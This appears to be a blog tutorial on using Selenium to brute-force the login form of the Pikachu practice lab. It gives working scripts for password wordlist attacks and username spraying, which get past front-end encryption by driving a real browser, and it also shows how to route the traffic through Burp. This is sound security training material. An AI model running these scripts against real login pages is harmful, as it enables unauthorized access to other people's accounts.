Selenium bypasses front-end encryption

For Selenium syntax, see the earlier note "Getting Started with Selenium".

Direct brute force (based on CSS selectors)

A single visit

CSS selectors make it easy to locate the username field, the password field and the login button. Comparing the page before and after a login attempt shows which element holds the result, and that gives us a basic script.
image.png

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time

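# Single scripted login against the local pikachu lab form, driven through a
# real Chrome instance. The browser itself loads the page and submits the
# form, so whatever JavaScript the page applies to the fields runs exactly as
# it would for a person typing into it.
browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'))
try:
    browser.implicitly_wait(10)  # element lookups retry for up to 10 seconds
    browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
    time.sleep(2)  # presumably a pause so each step can be watched in the demo

    # Clear the username field, then type the value.
    username = browser.find_element(By.CSS_SELECTOR, '[name="username"]')
    username.clear()
    username.send_keys('test')
    time.sleep(2)

    # Clear the password field, then type the value.
    password = browser.find_element(By.CSS_SELECTOR, '[name="password"]')
    password.clear()
    password.send_keys('123')
    time.sleep(2)

    # Submit the form by clicking the login button.
    login = browser.find_element(By.CSS_SELECTOR, '.submit')
    login.click()
    time.sleep(2)

    # Read the paragraph the page renders with the login result.
    result = browser.find_element(By.CSS_SELECTOR, '.bf_form_main > p')
    print(result.get_attribute('outerHTML'))
finally:
    # quit() ends the WebDriver session and stops the chromedriver process.
    # The original close() only closed the window, and it was skipped
    # altogether when any lookup above raised.
    browser.quit()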

# Result (script output)
<p> username or password is not exists~</p>

The captured traffic looks like this.
The browser first requests a JS file and then sends a POST request to log in. The User-Agent is that of a normal browser, so the request headers alone do not distinguish this from a manual login.
image.png

Adding a proxy

Lines 6–9 of the code add the bp (Burp Suite) proxy.

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time

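# Send all browser traffic through a local HTTP proxy so every request and
# response of the scripted login can be inspected there.
proxy_address = "127.0.0.1:8080"
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument(f"--proxy-server=http://{proxy_address}")

# Start Chrome with the proxy option and open the lab login form.
browser = webdriver.Chrome(service=Service(r'D:\tools\selenium\chromedriver.exe'), options=chrome_options)
try:
    browser.implicitly_wait(10)  # element lookups retry for up to 10 seconds
    browser.get('http://192.168.229.129/pikachu/vul/burteforce/bf_form.php')
    time.sleep(2)  # presumably a pause so each step can be watched in the demo

    # Clear the username field, then type the value.
    username = browser.find_element(By.CSS_SELECTOR, '[name="username"]')
    username.clear()
    username.send_keys('test')
    time.sleep(2)

    # Clear the password field, then type the value.
    password = browser.find_element(By.CSS_SELECTOR, '[name="password"]')
    password.clear()
    password.send_keys('123')
    time.sleep(2)

    # Submit the form by clicking the login button.
    login = browser.find_element(By.CSS_SELECTOR, '.submit')
    login.click()
    time.sleep(2)

    # Read the paragraph the page renders with the login result.
    result = browser.find_element(By.CSS_SELECTOR, '.bf_form_main > p')
    print(result.get_attribute('outerHTML'))
finally:
    # quit() ends the WebDriver session and stops the chromedriver process.
    # The original close() only closed the window, and it was skipped
    # altogether when any lookup above raised.
    browser.quit()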

Starting the brute force

Keep the username fixed and try to crack the password.

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time

# Start Chrome through the local chromedriver binary and open the lab login form.
chromedriver = Service(r'D:\tools\selenium\chromedriver.exe')
browser = webdriver.Chrome(service=chromedriver)
browser.implicitly_wait(10)  # element lookups retry for up to 10 seconds

form_url = 'http://192.168.229.129/pikachu/vul/burteforce/bf_form.php'
browser.get(form_url)
time.sleep(2)


# One login attempt: fixed username, caller-supplied password.
def login(try_password):
    """Submit the lab login form once with username 'test' and *try_password*.

    Prints the credentials tried and the outerHTML of the result paragraph.
    Uses the module-level ``browser``, which must already show the form.
    """

    def fill(selector, text):
        # Empty the field first so text left from the previous attempt is gone.
        field = browser.find_element(By.CSS_SELECTOR, selector)
        field.clear()
        field.send_keys(text)

    fill('[name="username"]', 'test')
    print('尝试用户名:test')

    fill('[name="password"]', try_password)
    print('尝试密码:' + try_password)

    # Submit by clicking the login button.
    browser.find_element(By.CSS_SELECTOR, '.submit').click()

    # The page reports the outcome in a <p> under .bf_form_main.
    outcome = browser.find_element(By.CSS_SELECTOR, '.bf_form_main > p')
    print('尝试结果:')
    print(outcome.get_attribute('outerHTML') + '\n')


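# Feed every line of the wordlist to login(), then shut the browser down.
# Seen from the server this is a rapid series of failed logins for the single
# account 'test' from one client; per-account attempt limits or lockout are
# the controls that interrupt it.
try:
    with open(r'C:\Users\asuka\Desktop\FastPwds.txt', 'r', encoding='utf8') as file:
        for line in file:
            # strip() already removes the trailing newline, so the original
            # extra replace('\n', '') was redundant.
            login(line.strip())
finally:
    # Runs even when an attempt raises. quit() ends the WebDriver session and
    # stops chromedriver, whereas the original close() only closed the window.
    browser.quit()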

The traffic shows that once the page has loaded, login attempts are sent one after another.
image.png
The animation below shows the attempts running in real time.
123.gif
To filter the results, use a negative lookahead, \<p\>\s(?!username): a line is shown only when <p> is not followed by "username".
image.png

Direct brute force (based on XPath)

The target is still the pikachu practice range used above.

Brute-forcing passwords

  1. Use XPath to simplify the code
  2. Check whether the login succeeded, and stop at the first success.

image.png

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
import time

# Launch Chrome via the local chromedriver and load the lab login form.
driver_service = Service(r'D:\tools\selenium\chromedriver.exe')
browser = webdriver.Chrome(service=driver_service)
browser.implicitly_wait(10)  # element lookups retry for up to 10 seconds

login_page = 'http://192.168.229.129/pikachu/vul/burteforce/bf_form.php'
browser.get(login_page)
time.sleep(2)

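# One login attempt: fixed username, caller-supplied password.
def login(try_password):
    """Submit the lab login form once with username 'test' and *try_password*.

    Prints the password tried and the outerHTML of the result paragraph.
    Uses the module-level ``browser``, which must already show the form.

    Raises:
        SystemExit: when the result paragraph does not contain the failure
            message, which this script treats as a successful login.
    """
    # Absolute XPaths: they break as soon as the page layout changes.
    panel = '/html/body/div[2]/div[2]/div/div[2]/div/div'

    # Clear the username field, then type the fixed username.
    username = browser.find_element(By.XPATH, panel + '/form/label[1]/span/input')
    username.clear()
    username.send_keys('test')

    # Clear the password field and type the candidate; the trailing newline
    # submits the form, so no click on the button is needed.
    password = browser.find_element(By.XPATH, panel + '/form/label[2]/span/input')
    password.clear()
    password.send_keys(try_password + '\n')
    print('尝试密码:' + try_password)

    # Read the result paragraph once and reuse the text below.
    result = browser.find_element(By.XPATH, panel + '/p')
    result_html = result.get_attribute('outerHTML')
    print('尝试结果:')
    print(result_html + '\n')

    # NOTE(review): anything other than the failure text counts as success,
    # so an unexpected error message would end the run as well.
    if 'username or password is not exists' not in str(result_html):
        print('破解成功,密码:'+try_password)
        # exit() is a helper the site module injects for interactive use and
        # can be missing; raising SystemExit is the equivalent builtin form.
        # It propagates past the caller's loop, so browser cleanup placed
        # after that loop only runs if it sits in a finally block.
        raise SystemExit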


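# Feed every line of the wordlist to login(), then shut the browser down.
# Seen from the server this is a rapid series of failed logins for the single
# account 'test' from one client; per-account attempt limits or lockout are
# the controls that interrupt it.
try:
    with open(r'C:\Users\asuka\Desktop\FastPwds.txt', 'r', encoding='utf8') as file:
        for line in file:
            # strip() already removes the trailing newline, so the original
            # extra replace('\n', '') was redundant.
            login(line.strip())
finally:
    # login() ends the process on the first success, which skipped the
    # original close() after the loop. The finally block runs on that path
    # and on errors, and quit() also stops the chromedriver process.
    browser.quit()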

Brute-forcing usernames, with the proxy added

image.png
image.png

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service

# Route the browser through a local HTTP proxy so each request can be inspected.
proxy_address = "127.0.0.1:8080"
chrome_options = webdriver.ChromeOptions()
proxy_flag = "--proxy-server=http://" + proxy_address
chrome_options.add_argument(proxy_flag)

# Start Chrome with that option and open the lab login form.
driver_service = Service(r'D:\tools\selenium\chromedriver.exe')
browser = webdriver.Chrome(service=driver_service, options=chrome_options)
browser.implicitly_wait(10)  # element lookups retry for up to 10 seconds
login_page = 'http://192.168.229.129/pikachu/vul/burteforce/bf_form.php'
browser.get(login_page)


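# One login attempt: caller-supplied username, fixed password.
def login(try_username):
    """Submit the lab login form once with *try_username* and password '123456'.

    Prints the username tried and the outerHTML of the result paragraph.
    Uses the module-level ``browser``, which must already show the form.

    Raises:
        SystemExit: when the result paragraph does not contain the failure
            message, which this script treats as a successful login.
    """
    # Absolute XPaths: they break as soon as the page layout changes.
    panel = '/html/body/div[2]/div[2]/div/div[2]/div/div'

    # Clear the username field, then type the candidate.
    username = browser.find_element(By.XPATH, panel + '/form/label[1]/span/input')
    username.clear()
    username.send_keys(try_username)
    print('尝试账号:' + try_username)

    # Clear the password field and type the fixed password; the trailing
    # newline submits the form, so no click on the button is needed.
    password = browser.find_element(By.XPATH, panel + '/form/label[2]/span/input')
    password.clear()
    password.send_keys('123456' + '\n')

    # Read the result paragraph once and reuse the text below.
    result = browser.find_element(By.XPATH, panel + '/p')
    result_html = result.get_attribute('outerHTML')
    print('尝试结果:')
    print(result_html + '\n')

    # NOTE(review): anything other than the failure text counts as success,
    # so an unexpected error message would end the run as well.
    if 'username or password is not exists' not in str(result_html):
        print('破解成功,:' + try_username + r'/123456')
        # exit() is a helper the site module injects for interactive use and
        # can be missing; raising SystemExit is the equivalent builtin form.
        # It propagates past the caller's loop, so browser cleanup placed
        # after that loop only runs if it sits in a finally block.
        raise SystemExit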


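# Feed every line of the username list to login(), then shut the browser down.
# Seen from the server this is one password tried against many accounts from
# a single client, so per-account counters see only one failure each; limits
# keyed on the client or on overall failure rate are what register it.
try:
    with open(r'C:\Users\asuka\Desktop\test.txt', 'r', encoding='utf8') as file:
        for line in file:
            # strip() already removes the trailing newline, so the original
            # extra replace('\n', '') was redundant.
            login(line.strip())
finally:
    # login() ends the process on the first success, which skipped the
    # original quit() after the loop. The finally block runs on that path
    # and on errors alike.
    browser.quit()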


Origin blog.csdn.net/weixin_44288604/article/details/132410470